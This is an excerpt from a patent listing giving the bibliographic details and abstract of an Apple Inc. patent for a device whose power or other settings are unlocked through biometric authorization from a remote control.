    Inventors: Stephen Tkac, Agnibrata Nayak, Pradosh Sivadoss, Govind Pande
  • Patent number: 10431024
    Abstract: An electronic device having at least one operational setting, such as a power setting, with at least a first state and a second state. The electronic device may also include an access controller that can receive state data and authorization data from an external source such as a remote control. The access controller may enable a state of the operational setting upon receipt of proper authorization data received from or related to the output from at least one biometric sensor associated with the remote control.
    Type: Grant
    Filed: May 16, 2017
    Date of Patent: October 1, 2019
    Assignee: Apple Inc.
    Inventors: Michael DiVincent, Nicole J. Hollopeter, Ruben Caballero